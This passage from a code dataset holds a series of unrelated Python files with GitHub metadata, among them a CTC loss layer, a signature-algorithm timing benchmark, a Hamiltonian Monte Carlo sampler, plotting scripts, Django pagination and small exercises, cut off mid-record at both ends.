tf.name_scope(\"loss_ctc\"):\n logits = self.output_with_activation\n if self.output_with_activation:\n logits = self.output_with_activation.get_logits()\n if logits is None:\n logits = tf.log(self.output.placeholder)\n assert logits.get_shape().ndims == 3 # (B,T,N) or (T,B,N)\n assert logits.get_shape().dims[2].value == self.target.dim + 1 # one more for blank\n seq_lens = self.output_seq_lens\n labels = self._get_target_sparse_labels()\n loss = tf.nn.ctc_loss(inputs=logits, labels=labels, sequence_length=seq_lens, time_major=self.output.is_time_major)\n return self.reduce_func(loss)\n\n def get_error(self):\n if not self.target.sparse:\n raise Exception(\"CTC target expected to be sparse (symbols)\")\n with tf.name_scope(\"loss_ctc_error\"):\n logits = None\n if self.output_with_activation:\n logits = self.output_with_activation.get_logits()\n if logits is None:\n logits = tf.log(self.output.placeholder)\n if not self.output.is_time_major:\n logits = tf.transpose(logits, [1, 0, 2]) # (B,T,N) => (T,B,N)\n seq_lens = self.output_seq_lens\n decoded, _ = tf.nn.ctc_greedy_decoder(inputs=logits, sequence_length=seq_lens)\n labels = self._get_target_sparse_labels()\n error = tf.edit_distance(hypothesis=tf.cast(decoded[0], labels.dtype), truth=labels, normalize=False)\n return self.reduce_func(error)\n\n def get_auto_output_layer_dim(self, target_dim):\n return target_dim + 1 # one added for blank\n\n\n_LossClassDict = {} # type: dict[str,type(Loss)]\n\ndef get_loss_class(loss):\n \"\"\"\n :param str loss: loss type such as \"ce\"\n :rtype: () -> Loss\n \"\"\"\n if not _LossClassDict:\n for v in globals().values():\n if isinstance(v, type) and issubclass(v, Loss) and v.class_name:\n assert v.class_name not in _LossClassDict\n _LossClassDict[v.class_name] = v\n return _LossClassDict[loss]\n\n\n_LayerClassDict = {} # type: dict[str,type(LayerBase)]\n\ndef _init_layer_class_dict():\n for v in globals().values():\n if isinstance(v, type) and issubclass(v, LayerBase) and v.layer_class:\n assert v.layer_class not in _LayerClassDict\n _LayerClassDict[v.layer_class] = v\n for alias, v in {\"forward\": LinearLayer}.items():\n assert alias not in _LayerClassDict\n _LayerClassDict[alias] = v\n\n\ndef get_layer_class(name):\n \"\"\"\n :param str name: matches layer_class\n :rtype: () -> LayerBase\n \"\"\"\n if not 
_LayerClassDict:\n _init_layer_class_dict()\n if name not in _LayerClassDict:\n raise Exception(\"unknown layer class %r\" % name)\n return _LayerClassDict[name]\n\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/rwth-i6_returnn/returnn-master/TFNetworkLayer.py","file_name":"TFNetworkLayer.py","file_ext":"py","file_size_in_byte":37936,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"30079499783","text":"import time\nfrom Crypto.Hash import SHA\nfrom Crypto.Hash import SHA256\nfrom Crypto.Hash import SHA3_256\nfrom Crypto.Hash import SHA384\nfrom Crypto.Signature import DSS\nfrom Crypto.PublicKey import ECC\nfrom Crypto.PublicKey import DSA\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Signature import PKCS1_PSS\nfrom Crypto.Cipher import PKCS1_OAEP\nfrom Crypto.Signature import pss\nfrom Crypto import Random\n\ndef DSA_sign(key, h):\n signer = DSS.new(key, 'deterministic-rfc6979')\n return signer.sign(h)\n\ndef DSA_verify(sign, key, h):\n try:\n verifier = DSS.new(key, 'deterministic-rfc6979')\n verifier.verify(h, sign)\n except ValueError:\n print ('The message is not authentic')\n\ndef hashed_message(hash_type, message):\n if hash_type =='SHA-1':\n h = SHA.new(bytes(message, 'utf-8'))\n elif hash_type =='SHA-224':\n h = SHA256.new(bytes(message, 'utf-8'))\n elif hash_type =='SHA-256':\n h = SHA256.new(bytes(message, 'utf-8'))\n elif hash_type =='SHA-384':\n h = SHA384.new(bytes(message, 'utf-8'))\n else:\n h = SHA256.new(bytes(message, 'utf-8'))\n\n return h\n\n \ndef DSA_times(tests_information):\n key_param = [line.strip('\\n') for line in open(\"dsa_key_params.txt\")]\n p=int(key_param[0], 16)\n q=int(key_param[1], 16)\n g=int(key_param[2], 16)\n x=int(key_param[3], 16)\n y=int(key_param[4], 16)\n\n key= DSA.construct([y, g, p, q, x]) #Construccion de la llave\n sign_times = []\n verify_times = []\n print(key)\n for t in tests_information:\n [hash_type, message] = t.split(',')\n h = hashed_message(hash_type, message)\n \n #sign\n start_time = time.perf_counter()\n sign = DSA_sign(key, h)\n elapsed_time = time.perf_counter() - start_time\n sign_times.append(elapsed_time)\n \n #verification\n start_time = time.perf_counter()\n DSA_verify(sign, key, h)\n elapsed_time = time.perf_counter() - start_time\n verify_times.append(elapsed_time)\n\n return [sign_times, verify_times]\n\n\ndef ECDSA_sign(key, h):\n signer = DSS.new(key, 'deterministic-rfc6979')\n return signer.sign(h)\n\ndef ECDSA_verify(sign, key, h):\n try:\n verifier = DSS.new(key, 'deterministic-rfc6979')\n verifier.verify(h, sign)\n except ValueError:\n print ('The message is not authentic')\n\n \ndef ECDSA_times(tests_information):\n key_params = [line.strip('\\n') for line in open(\"ECDSA_key_params.txt\")]\n q=int(key_params[0], 16)\n x=int(key_params[1], 16)\n ux=int(key_params[2], 16)\n uy=int(key_params[3], 16)\n key=ECC.construct(curve='NIST P-521', d=x, point_x=ux, point_y=uy)\n sign_times = []\n verify_times = []\n for t in tests_information:\n [hash_type, message] = t.split(',')\n h = hashed_message(hash_type, message)\n\n \n #sign\n start_time = time.perf_counter()\n sign = ECDSA_sign(key, h)\n elapsed_time = time.perf_counter() - start_time\n sign_times.append(elapsed_time)\n \n #verification\n start_time = time.perf_counter()\n ECDSA_verify(sign, key, h)\n elapsed_time = time.perf_counter() - start_time\n verify_times.append(elapsed_time)\n\n return [sign_times, verify_times]\n\n\n\ndef RSA_PSS_sign(key, message):\n h = 
SHA256.new(message)\n signer = pss.new(key)\n return signer.sign(h)\n\ndef RSA_PSS_verify(message, key, sign):\n try:\n h = SHA256.new(message)\n verifier = pss.new(key)\n verifier.verify(h, sign) \n except ValueError:\n print ('The message is not authentic')\n\ndef RSA_PSS_times():\n sign_times = []\n verify_times = []\n for i in range(0, 11):\n message = Random.get_random_bytes(64)\n key = RSA.generate(1024) \n # To sign\n start_time = time.perf_counter()\n sign = RSA_PSS_sign(key, message)\n elapsed_time = time.perf_counter() - start_time\n sign_times.append(elapsed_time)\n\n\n # To verify\n start_time = time.perf_counter()\n RSA_PSS_verify(message, key, sign)\n elapsed_time = time.perf_counter() - start_time\n\n verify_times.append(elapsed_time)\n\n return [verify_times, sign_times]\n\ndef print_cipher_times(DSA, ECDSA, RSA_PSS):\n number_of_vectors = len(DSA)\n DSA_total_time = 0\n ECDSA_total_time = 0\n RSA_PSS_total_time = 0\n\n print('\\n\\t#------------------------------------------------------------------------------------------------------#')\n print('\\t| FIRMA |') \n print('\\t#------------------------------------------------------------------------------------------------------#')\n print('\\t| No. Vector | DSA | ECDSA | RSA_PSS |')\n print('\\t#------------------------------------------------------------------------------------------------------#')\n for t in range(number_of_vectors):\n print('\\t| vector ',t ,' |\\t {:0.6f} |\\t {:0.6f} |\\t {:0.6f} |'.format(DSA[t], ECDSA[t],RSA_PSS[t]))\n print('\\t#------------------------------------------------------------------------------------------------------#')\n DSA_total_time += DSA[t]\n ECDSA_total_time += ECDSA[t]\n RSA_PSS_total_time += RSA_PSS[t]\n\n print('\\t| Promedio |\\t {:0.6f} |\\t {:0.6f} |\\t {:0.6f} |'.format(DSA_total_time/number_of_vectors, ECDSA_total_time/number_of_vectors,RSA_PSS_total_time/number_of_vectors))\n print('\\t#------------------------------------------------------------------------------------------------------#\\n')\n\ndef print_descipher_times(DSA, ECDSA, RSA_PSS):\n number_of_vectors = len(DSA)\n DSA_total_time = 0\n ECDSA_total_time = 0\n RSA_PSS_total_time = 0\n\n print('\\n\\t#------------------------------------------------------------------------------------------------------#')\n print('\\t| Verificación |') \n print('\\t#------------------------------------------------------------------------------------------------------#')\n print('\\t| No. 
Vector | DSA | ECDSA | RSA_PSS |')\n print('\\t#------------------------------------------------------------------------------------------------------#')\n for t in range(number_of_vectors):\n print('\\t| vector ',t ,' |\\t {:0.6f} |\\t {:0.6f} |\\t {:0.6f} |'.format(DSA[t], ECDSA[t],RSA_PSS[t]))\n print('\\t#------------------------------------------------------------------------------------------------------#')\n DSA_total_time += DSA[t]\n ECDSA_total_time += ECDSA[t]\n RSA_PSS_total_time += RSA_PSS[t]\n\n print('\\t| Promedio |\\t {:0.6f} |\\t {:0.6f} |\\t {:0.6f} |'.format(DSA_total_time/number_of_vectors, ECDSA_total_time/number_of_vectors,RSA_PSS_total_time/number_of_vectors))\n print('\\t#------------------------------------------------------------------------------------------------------#\\n')\n\ndef compare_signature_algorithms():\n tests_information = [line.strip('\\n') for line in open(\"signature_vectors.txt\" )]\n [sign_ECDSA_times, verify_ECDSA_times] = ECDSA_times(tests_information)\n [sign_DSA_times, verify_DSA_times] = ECDSA_times(tests_information)\n [sign_RSA_PSS_rimes, verify_RSA_PSS_times] = RSA_PSS_times()\n print_cipher_times(sign_DSA_times, sign_ECDSA_times, sign_RSA_PSS_rimes)\n print_descipher_times(verify_DSA_times, verify_ECDSA_times, verify_RSA_PSS_times)\n\n\n","repo_name":"bemesa21/cryptography_project","sub_path":"signature_algorithms.py","file_name":"signature_algorithms.py","file_ext":"py","file_size_in_byte":7888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"5928994344","text":"#!/bin/env python\n#\n# Read in and plot part of the Millennium simulation\n# from the HDF5 wrapped snapshot using swiftsimio.\n#\n\nimport matplotlib.pyplot as plt\nimport swiftsimio as sw\n\nmask = sw.mask(\"snap_millennium_063.hdf5\")\n\n# Choose region to read (in terms of the boxsize to get the units right)\nb = mask.metadata.boxsize[0]\nload_region=((0*b,.1*b),(0*b,.1*b),(0*b,.1*b))\n\n# Seelct the region\nmask.constrain_spatial(load_region)\ndata = sw.load(\"snap_millennium_063.hdf5\", mask=mask)\n\n# Read particle positions\npos = data.dark_matter.coordinates\nmass = data.dark_matter.masses\n\n# Generate smoothing lengths for the dark matter\nfrom swiftsimio.visualisation.smoothing_length_generation import generate_smoothing_lengths\ndata.dark_matter.smoothing_length = generate_smoothing_lengths(\n data.dark_matter.coordinates,\n data.metadata.boxsize,\n kernel_gamma=1.8,\n neighbours=57,\n speedup_fac=2,\n dimension=3,\n)\n\n# Project the dark matter mass\nfrom swiftsimio.visualisation.projection import project_pixel_grid\ndm_mass = project_pixel_grid(\n # Note here that we pass in the dark matter dataset not the whole\n # data object, to specify what particle type we wish to visualise\n data=data.dark_matter,\n boxsize=0.1*data.metadata.boxsize,\n resolution=1024,\n project=\"masses\",\n parallel=True,\n region=None\n)\n\nfrom matplotlib.pyplot import imshow\nfrom matplotlib.colors import LogNorm\nplt.figure(figsize=(8,8))\nimshow(LogNorm()(dm_mass).T, cmap=\"inferno\", origin=\"lower\",\n extent=(load_region[0][0], load_region[0][1], load_region[1][0], load_region[1][1]))\nplt.xlabel(\"x [Mpc/h]\")\nplt.ylabel(\"y [Mpc/h]\")\nplt.gca().set_aspect(\"equal\")\nplt.title(\"Millennium simulation, 
z=0\")\nplt.savefig(\"wrapped_millennium.png\")\n","repo_name":"jchelly/DFED-MetadataWrapper","sub_path":"examples/read_wrapped_millennium.py","file_name":"read_wrapped_millennium.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71158866933","text":"import matplotlib.pyplot as plt\nimport geopandas as gpd\nfrom src.const import order\nfrom shapely.geometry import LineString\nimport matplotlib as mpl\n\nmpl.rcParams['pdf.fonttype'] = 42\nmpl.rcParams['ps.fonttype'] = 42\nmpl.rcParams['font.family'] = 'Times New Roman'\nmpl.rcParams['font.size'] = 10\nmpl.rcParams['axes.unicode_minus'] = False\nmpl.rcParams['mathtext.fontset'] = 'custom'\nmpl.rcParams['mathtext.rm'] = 'Times New Roman'\nmpl.rcParams['mathtext.it'] = 'Times New Roman:italic'\nmpl.rcParams['mathtext.bf'] = 'Times New Roman:bold'\n\n\ndef pipeline_filter(modify_x,N,P,filepath=\"../data/capital coordination/capital coordination.shp\"): \n \n coord=gpd.read_file(filepath)\n coord.set_index('index', inplace=True)\n \n pipeline=gpd.GeoDataFrame(index=[(i,j) for i in order for j in order ],columns=[\"start province\",\"end province\",\"capacity_n\",\"capacity_p\",\"geometry\",\"ifbuildh2\"],crs=\"EPSG:4326\")\n pipeline.geometry=pipeline.index.to_series().apply(lambda x: LineString([coord.geometry[x[0]],coord.geometry[x[1]]]))\n pipeline[\"start province\"]=pipeline.index.to_series().apply(lambda x: x[0])\n pipeline[\"end province\"]=pipeline.index.to_series().apply(lambda x: x[1])\n pipeline.capacity_n=pipeline.index.to_series().apply(lambda x: N[x[0],x[1]].X)\n pipeline.capacity_p=pipeline.index.to_series().apply(lambda x: P[x[0],x[1]].X)\n pipeline[\"ifbuildh2\"]=pipeline.index.to_series().apply(lambda y: modify_x.loc[y[0],y[1]])\n return pipeline,coord\n\n\n\n\ndef draw_sankey(modify_x,N,P,filepath_china=\"../data/china-shapefiles/china.shp\",filepath_nine=\"../data/china-shapefiles/china_nine_dotted_line.shp\"):\n china = gpd.read_file(filepath_china,encoding='utf-8') \n china = china.dissolve(by='OWNER').reset_index(drop=False) # 由于每行数据是单独的面,因此按照其省份列OWNER融合\n nine_lines = gpd.read_file(filepath_nine,encoding='utf-8')\n fig = plt.figure(figsize=(8.3/2, 6),dpi=300)\n ax = plt.axes([0,0,1,1]) #左下角x坐标,左下角y坐标,宽度,高度(0~1,归一化了)\n albers_proj = '+proj=aea +lat_1=25 +lat_2=47 +lon_0=105'\n ax = china.geometry.to_crs(albers_proj).plot(ax=ax,\n facecolor='grey',\n edgecolor='white',\n linestyle='--',\n alpha=0.8)\n ax = nine_lines.geometry.to_crs(albers_proj).plot(ax=ax,\n edgecolor='grey',\n linewidth=1,\n alpha=0.4)\n ax.axis('off') # 移除坐标轴\n \n pipeline,coord=pipeline_filter(modify_x,N,P)\n pipeline=pipeline.to_crs(albers_proj)\n pipe_h2=pipeline[pipeline[\"ifbuildh2\"]>0]\n pipe_h2=pipe_h2.set_geometry(\"geometry\")\n for i in range(len(pipe_h2)):\n pipe=pipe_h2.iloc[i] \n base=pipe[\"capacity_p\"]/pipe_h2[\"capacity_p\"].max()\n ax.annotate(\"\",\n xy=pipe.geometry.coords[1],\n xytext=pipe.geometry.coords[0],\n size=5, \n va=\"center\",\n ha=\"center\",\n arrowprops=dict(connectionstyle=\"arc3\", # for straight line, rad=0\n edgecolor='none',\n width=base*4, headwidth=base*10,headlength=base*10)\n )\n \n x_text=(pipe.geometry.coords[1][0]+pipe.geometry.coords[0][0])/2\n y_text=(pipe.geometry.coords[1][1]+pipe.geometry.coords[0][1])/2\n ax.text(x_text,y_text,'{:.1f}'.format(pipe[\"capacity_p\"]/1000000),fontsize=3)\n coord.to_crs(albers_proj).plot(ax=ax, color='green', markersize=50, marker='.')\n fig.suptitle('Pure hydrogen 
pipeline distribution of China in 2060 ', fontsize=12, fontweight='bold')\n ax.set_title('Capacity unit:million ton')\n return ax\n\n\n","repo_name":"cecicxy/Hydrogen-pipeline-network","sub_path":"code/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":4005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19771938777","text":"\"\"\"Implementation for Hamiltonian Monte Carlo (HMC) sampling.\"\"\"\n# pylint: disable=E1101\nimport typing as t\n\nimport autograd\nimport autograd.numpy as np\n\n\ndef hmc(initial_theta: np.ndarray,\n target_logpdf: t.Callable[[np.ndarray], float],\n num_samples: int = 200,\n num_leapfrog_steps: int = 50,\n step_size: float = 0.1,\n burnout_frac: float = 0.5,\n random_state: t.Optional[int] = None,\n verbose: bool = False,\n return_acc_rate: bool = False\n ) -> t.Union[np.ndarray, t.Tuple[np.ndarray, float]]:\n \"\"\"Hamiltonian Monte Carlo implementation.\n\n Arguments\n ---------\n initial_theta : :obj:`np.ndarray`\n Initial values for the Markov Chain.\n\n target_logpdf : :obj:`t.Callable`\n Log-density target function. Must receive a :obj:`np.ndarray`\n as the first argument, and return the natural (base-e) logarithm\n of the probability density evaluated at the given point as the\n argument.\n\n num_samples : :obj:`int`, optional\n Number of instances to sample.\n\n num_leapfrog_steps : :obj:`int`, optional\n Number of ``leapfrog`` steps for every sample.\n\n step_size : :obj:`float`, optional\n Also known as ``epsilon`` parameter. Affects the step size of\n each ``leapfrog`` step.\n\n burnout_frac : :obj:`float`, optional\n Fraction of initial samples to ignore. Must be a :obj:`float`\n value in [0, 1) range. Used to minimize the influence of the\n ``initial_theta`` value on the samples. More precisely, the\n np.ceil(num_samples * burnout_frac) first instances will be\n ignored before returning the samples.\n\n random_state : :obj:`int`, optional\n If not None, set numpy random seed before the first HMC\n sampling.\n\n verbose : :obj:`bool`, optional\n Enable priting of additional information about the HMC process.\n\n return_acc_rate : :obj:`bool`, optional\n If True, return also the acceptance rate of the HMC process.\n\n Returns\n -------\n :obj:`np.ndarray`\n HMC samples.\n\n Notes\n -----\n Works only for unimodal targets. 
Need to implement parallel\n tempering for multimodal targets.\n \"\"\"\n\n def calc_total_energy(momentum: np.ndarray,\n theta_logtarget: float) -> float:\n \"\"\"Calculates the total energy of the current position on HMC process.\"\"\"\n energy_kinetic = 0.5 * np.dot(momentum, momentum)\n energy_potential = -theta_logtarget\n energy_total = energy_kinetic + energy_potential\n return energy_total\n\n def leapfrog_integration(\n theta: np.ndarray, theta_grad: np.ndarray,\n momentum: np.ndarray) -> t.Tuple[np.ndarray, np.ndarray]:\n \"\"\"Perform Leapfrog Integration.\"\"\"\n theta_new = theta\n grad_new = theta_grad\n\n for _ in np.arange(num_leapfrog_steps):\n momentum += step_size * 0.5 * grad_new\n theta_new += step_size * momentum\n grad_new = grad_fun(theta_new)\n momentum += step_size * 0.5 * grad_new\n\n return theta_new, grad_new\n\n if not 0 <= burnout_frac < 1:\n raise ValueError(\"'burnout_frac' must be in [0, 1) interval.\")\n\n if not isinstance(initial_theta, np.ndarray):\n initial_theta = np.array(initial_theta)\n\n if random_state is not None:\n np.random.seed(random_state)\n\n thetas = np.zeros((num_samples, initial_theta.size))\n grad_fun = autograd.grad(target_logpdf)\n\n theta_cur = np.copy(initial_theta)\n theta_cur_grad = grad_fun(theta_cur)\n theta_logtarget_cur = target_logpdf(theta_cur)\n hits = 0\n\n for sample_id in np.arange(num_samples):\n momentum = np.random.randn(theta_cur.size)\n total_energy_initial = calc_total_energy(\n momentum=momentum, theta_logtarget=theta_logtarget_cur)\n\n theta_new, grad_new = leapfrog_integration(\n theta=theta_cur, theta_grad=theta_cur_grad, momentum=momentum)\n\n theta_logtarget_new = target_logpdf(theta_new)\n total_energy_final = calc_total_energy(\n momentum=momentum, theta_logtarget=theta_logtarget_new)\n\n delta_energy = total_energy_initial - total_energy_final\n if np.log(np.random.uniform(0, 1)) < delta_energy:\n theta_cur = theta_new\n theta_cur_grad = grad_new\n theta_logtarget_cur = theta_logtarget_new\n hits += 1\n\n thetas[sample_id, :] = theta_cur\n\n acc_rate = hits / num_samples\n\n if verbose:\n print(\"Acceptance ratio: {:.4f}\".format(acc_rate))\n print(\"Theoretically expected: [0.6, 0.8] (results may be {}.)\"\n .format(\"optimal\" if 0.6 <= acc_rate <= 0.8 else \"not optimal\"))\n\n burnout_ind = int(np.ceil(num_samples * burnout_frac))\n thetas = thetas[burnout_ind:]\n\n if return_acc_rate:\n return thetas, acc_rate\n\n return thetas\n\n\ndef _test():\n import matplotlib.pyplot as plt\n random_state = 32\n\n def log_sphere(theta):\n return -20 * np.square(np.linalg.norm(theta, ord=2) - 10)\n\n thetas = hmc(\n initial_theta=[3.0, 0.0],\n target_logpdf=log_sphere,\n random_state=random_state,\n num_leapfrog_steps=50,\n step_size=0.2,\n verbose=True)\n\n print(\"Sampled {} instances.\".format(thetas.shape[0]))\n plt.plot(thetas[:, 0], thetas[:, 1])\n plt.show()\n\n\nif __name__ == \"__main__\":\n _test()\n","repo_name":"FelSiq/statistics-related","sub_path":"dist_sampling_and_related_stats/hamiltonian_monte_carlo.py","file_name":"hamiltonian_monte_carlo.py","file_ext":"py","file_size_in_byte":5439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"18288000457","text":"from frames.abstract_frame import AbstractFrame\nfrom frames.builders.chan_thread_builder import ChanThreadBuilder\n\nclass ThreadFrame(AbstractFrame, ChanThreadBuilder):\n def __init__(self, boardString, threadNumber, urwidViewManager, uFilter = None):\n 
super().__init__(urwidViewManager, uFilter)\n\n self.boardString = boardString\n self.threadNumber = threadNumber\n\n self.threadWidgetDict = {}\n\n self.url = 'https://a.4cdn.org' + self.boardString + 'thread/' + str(self.threadNumber) + '.json'\n # self.imageUrl = 'http://boards.4chan.org' + self.boardString + 'thread/' + str(self.threadNumber)\n self.imgPrefix = 'https://i.4cdn.org'\n self.headers = {}\n\n self.postReplyDict = {}\n\n self.load()\n self.headerString = f'TerminusBrowser - 4chan: {self.boardString} -- {str(self.threadNumber)}'\n\n if self.url in self.uvm.watched:\n self.uvm.watched[self.url]['numReplies'] = len(self.comments)\n\n # Overrides super\n def loader(self):\n self.comments = self.getJSONThread()\n self.contents = self.buildFrame()\n","repo_name":"wtheisen/TerminusBrowser","sub_path":"src/frames/fchan/thread_frame.py","file_name":"thread_frame.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"21"} +{"seq_id":"73523400691","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 10 23:29:15 2019\n\n@author: Hillel Awaskar\n\"\"\"\n\nimport wikipedia, os\nfrom wordcloud import WordCloud, STOPWORDS\ncurr_path = \"C:\\\\Users\\\\Irene\\\\Natural-Language-Processing\\\\\"\n\nstopwords = set(STOPWORDS)\n\ndef get_wiki_content(query):\n title = wikipedia.search(query)[0]\n page = wikipedia.page(title)\n return page.content\n\ndef beautiful_wordcloud(text):\n sw = set(STOPWORDS)\n wc = WordCloud(background_color=\"white\", \n max_words = 200,\n max_font_size=40, \n scale=3,\n stopwords = sw)\n WordCloud()\n wc.generate(text)\n wc.to_file(os.path.join(curr_path, \"word_cld.png\"))\n \n\nbeautiful_wordcloud(get_wiki_content(\"Mauryan Empire\"))\n\n","repo_name":"hillelawaskar/Natural-Language-Processing","sub_path":"NLP_Learn3_word_cloud.py","file_name":"NLP_Learn3_word_cloud.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2063518229","text":"from menu import Menu, MenuItem\nfrom coffee_maker import CoffeeMaker\nfrom money_machine import MoneyMachine\n\n\ncashier = MoneyMachine()\nbarista = CoffeeMaker()\nmenu = Menu()\n\nturned_on = True\n\nwhile turned_on:\n choice = \"\"\n while not choice:\n choice = input(f\"What would you like? 
({menu.get_items()}): >\")\n if choice != \"report\" and choice != \"off\":\n choice = menu.find_drink(choice)\n elif choice == \"report\":\n barista.report()\n cashier.report()\n choice = \"\"\n continue\n elif choice == \"off\":\n turned_on = False\n break\n else:\n pass\n if barista.is_resource_sufficient(choice) and cashier.make_payment(choice.cost):\n barista.make_coffee(choice)\n","repo_name":"desaga/oop-barista","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37088996871","text":"\n###############################################################################\n# Code : Pagination\n# Author : Arun Kumar R\n# Description : Send the particular no of data from bulk amount of data\n# Create Date : 09-02-2019\n# Version : 1.0\n###############################################################################\n# Change log\n###############################################################################\n# Date Version Details Edited by\n# 2019-02-09 1.0 Inital Version Arun Kumar R\n###############################################################################\nfrom django.core.paginator import Paginator\nfrom superuser import models\nfrom django.db.models import Sum, Q\nfrom django.contrib.auth.models import User\n\n\nclass Pagination(object):\n\n def __init__(self):\n self.page = None\n self.no_of_data = None\n self.queryset = None\n self.empty_list = list()\n\n def pagination(self, page, no_of_data, queryset, **kwargs):\n self.page = int(page)\n self.no_of_data = no_of_data\n self.queryset = eval(queryset)\n data = Paginator(self.queryset, self.no_of_data)\n if data.num_pages >= self.page:\n paginted_data = data.page(self.page).object_list\n return paginted_data\n else:\n return self.empty_list\n","repo_name":"pmvenkat/AjaxCRUD","sub_path":"superuser/pagination.py","file_name":"pagination.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32017693031","text":"## import modules here \n\n################# Question 0 #################\n\n\ndef add(a, b): # do not change the heading of the function\n return a + b\n\n\n################# Question 1 #################\n\ndef nsqrt(x): # do not change the heading of the function\n low = 0\n mid = 0\n up = x + 1\n flag = False\n while not flag:\n mid = (low + up) // 2\n if mid ** 2 <= x < (mid + 1) ** 2:\n flag = True\n else:\n if mid ** 2 > x:\n up = mid\n else:\n low = mid\n return mid\n\n\n################# Question 2 #################\n\n\n# x_0: initial guess\n# EPSILON: stop when abs(x - x_new) < EPSILON\n# MAX_ITER: maximum number of iterations\n\n## NOTE: you must use the default values of the above parameters, do not change them\n\ndef find_root(f, fprime, x_0=1.0, EPSILON=1E-7, MAX_ITER=1000): # do not change the heading of the function\n x = x_0\n x_new = x_0 - f(x_0)/fprime(x_0)\n count_iter = 1\n while abs(x_new - x) >= EPSILON and count_iter < MAX_ITER:\n x = x_new\n x_new = x - f(x)/fprime(x)\n count_iter += 1\n return x_new\n\n\n################# Question 3 #################\n\nclass Tree(object):\n def __init__(self, name='ROOT', children=None):\n self.name = name\n self.children = []\n if children is not None:\n for child in children:\n self.add_child(child)\n\n def __repr__(self):\n return self.name\n\n def add_child(self, node):\n assert isinstance(node, Tree)\n 
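The `nsqrt` binary search in the submission record above works because it maintains the invariant `mid**2 <= x < (mid+1)**2`, which uniquely pins down floor(sqrt(x)). A quick harness that restates the search compactly and checks it against `math.isqrt` (available from Python 3.8):

```python
import math

def nsqrt(x):
    # Compact restatement of the search above: narrow [low, up) until
    # mid satisfies mid**2 <= x < (mid+1)**2.
    low, up = 0, x + 1
    while True:
        mid = (low + up) // 2
        if mid ** 2 <= x < (mid + 1) ** 2:
            return mid
        if mid ** 2 > x:
            up = mid
        else:
            low = mid

for x in range(10000):
    assert nsqrt(x) == math.isqrt(x)
print("nsqrt matches math.isqrt on 0..9999")
```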
self.children.append(node)\n\n\ndef make_tree(tokens): # do not change the heading of the function\n assert len(tokens) > 0\n tmp_stack = []\n tmp_tree = Tree(tokens[0])\n tmp_stack.append(tmp_tree)\n for token in tokens[2:-1]:\n if token == '[':\n tmp_stack.append(tmp_tree)\n elif token == ']':\n tmp_stack.pop()\n else:\n tmp_tree = Tree(token)\n tmp_stack[-1].add_child(tmp_tree)\n return tmp_stack[-1]\n\n\ndef max_depth(root): # do not change the heading of the function\n if len(root.children) == 0:\n return 1\n else:\n return max([1 + max_depth(i) for i in root.children])\n\n\n\n# if __name__ == \"__main__\":\n# ## test question 1\n# # print(nsqrt(1))\n# # print(nsqrt(11))\n# # print(nsqrt(1369))\n# #\n# ## test question 2\n# # def f(x):\n# # return x * math.log(x) - 16.0\n# #\n# # def fprime(x):\n# # return 1.0 + math.log(x)\n# #\n# # x = find_root(f, fprime)\n# # print(x)\n# # print(f(x))\n#\n# # test question 3-1\n# def print_tree(root, indent=0):\n# print(' ' * indent, root)\n# if len(root.children) > 0:\n# for child in root.children:\n# print_tree(child, indent + 4)\n#\n# toks = ['1', '[', '2', '[', '3', '4', '5', ']', '6', '[', '7', '8', '[', '9', ']', '10', '[', '11', '12', ']', ']', '13', ']']\n# tt = make_tree(toks)\n# print_tree(tt)\n#\n# ## test question 3-2\n# depth = max_depth(tt)\n# print(depth)\n# pass\n","repo_name":"SoIomon/LC_Homework","sub_path":"Lab1_specs/submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21448333328","text":"# Testa se três inteiros formam uma progressão aritmética ou geométrica\r\nprint ('Progressão Aritmética ou Geométrica')\r\n\r\na = float(input('Digite um inteiro a: '))\r\nb = float(input('Digite um inteiro b: '))\r\nc = float(input('Digite um inteiro c: '))\r\n\r\n# se a distância/diferença entre a e b é a mesma que entre b e c,\r\n# temos um PA (progressão aritmética)\r\nif b-a == c-b:\r\n print('a, b e c formam uma Progressão Aritmética de razão {:.2f}.'\r\n .format(b-a))\r\nelse:\r\n print('a, b e c NÃO formam uma Progressão Aritmética.')\r\n \r\n# se a ou b tiverem valor zero, não é possível que seja\r\n# uma progressão geométrica, então finaliza o programa\r\nif a==0 or b==0: exit()\r\n\r\n# se a proporção/razao entre a e b é a mesma que entre b e c,\r\n# temos um PG (progressão geométrica)\r\nif b/a == c/b:\r\n print('a, b e c formam uma Progressão Geométrica de razão {:f}.'\r\n .format(b/a))\r\nelse:\r\n print('a, b e c NÃO formam uma Progressão Geométrica.')\r\n \r\n\r\n","repo_name":"pjandl/opy1","sub_path":"Dia_2/progressaoAritmetica.py","file_name":"progressaoAritmetica.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"pt","doc_type":"code","stars":21,"dataset":"github-code","pt":"21"} +{"seq_id":"3754371522","text":"from collections import defaultdict\n\ndef solution(tickets):\n answer = []\n # 인접리스트 생성\n def init():\n route = defaultdict(list)\n for key, value in tickets:\n route[key].append(value)\n return route\n \n def dfs():\n stack = ['ICN']\n path = []\n while len(stack) > 0: # 스택이 빌때까지\n top = stack[-1]\n # top 